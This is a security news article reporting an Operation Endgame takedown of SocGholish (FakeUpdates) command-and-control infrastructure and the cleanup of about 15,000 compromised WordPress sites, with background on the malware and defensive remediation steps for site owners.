A coordinated law enforcement and private sector operation has disrupted the SocGholish malware distribution network, seizing 106 command-and-control (C&C) servers and domains used to orchestrate infections across the web. In the aftermath, security teams were able to clean approximately 15,000 compromised WordPress websites that had been serving as infection staging platforms for the botnet.
What Is SocGholish?
SocGholish — also known as FakeUpdates — is a JavaScript-based malware framework that has been active since at least 2017. It primarily operates by injecting malicious JavaScript into compromised websites, typically WordPress installations, to display fake browser update prompts to visitors. When users accept the "update," they instead download a ZIP file containing a JavaScript payload that establishes a foothold on their machine.
SocGholish has been widely used as an initial access broker, delivering secondary malware including:
- NetSupport RAT for remote access
- Cobalt Strike beacons for enterprise network penetration
- Ransomware loaders for groups including WastedLocker and various RaaS affiliates
The framework is closely associated with Evil Corp (also known as TA505 and Indrik Spider), a Russia-linked cybercrime group sanctioned by the U.S. Treasury Department.
Operation Endgame
Operation Endgame is an ongoing international law enforcement effort targeting the infrastructure underpinning major malware distribution networks and initial access brokers. Previous phases of Operation Endgame in 2024 targeted IcedID, Smokeloader, SystemBC, and other malware families.
This latest action represents the first major SocGholish-specific disruption under the operation. Participating agencies and private partners executed coordinated sinkholing and seizure actions against 106 domains and server instances used by SocGholish operators to:
- Serve the malicious JavaScript injection code to compromised sites
- Host the fake browser update lures and ZIP payloads
- Manage victim telemetry and secondary payload delivery
WordPress Sites as Infection Intermediaries
SocGholish operators do not directly compromise victim machines from their own servers. Instead, they first compromise legitimate, high-traffic websites — predominantly WordPress sites — and inject their malicious JavaScript into those sites' pages. This technique allows the malware to be served from trusted, legitimate domains, bypassing many reputation-based security controls.
The 15,000 WordPress sites cleaned up as part of this action had been unknowingly serving SocGholish injection code to their visitors. Owners of these sites are being notified and assisted with remediation through web hosting providers and national CERTs.
Remediation for Website Owners
WordPress site administrators should take the following steps to verify whether their site was impacted:
- Scan all JavaScript files and theme files for unexpected code injections, particularly code that generates
<script>tags dynamically or contacts external domains - Check
wp-config.php,.htaccess, and any customfunctions.phpfiles for unauthorized modifications - Review user accounts for unauthorized administrator additions
- Update all WordPress core, plugin, and theme components to latest versions
- Change all administrative credentials and consider implementing two-factor authentication
- Review server-level access logs for the past 6–12 months for unauthorized file modifications
Ongoing Threat
While this takedown represents a significant disruption, SocGholish infrastructure has historically been rebuilt within weeks following previous disruptions. Security researchers note that the underlying WordPress vulnerability exploitation campaigns that seed the initial site compromises will likely continue, and new C&C infrastructure may emerge.
Organizations using WordPress should ensure website firewall and malware scanning tools (such as Wordfence or Sucuri) are deployed and maintaining real-time monitoring.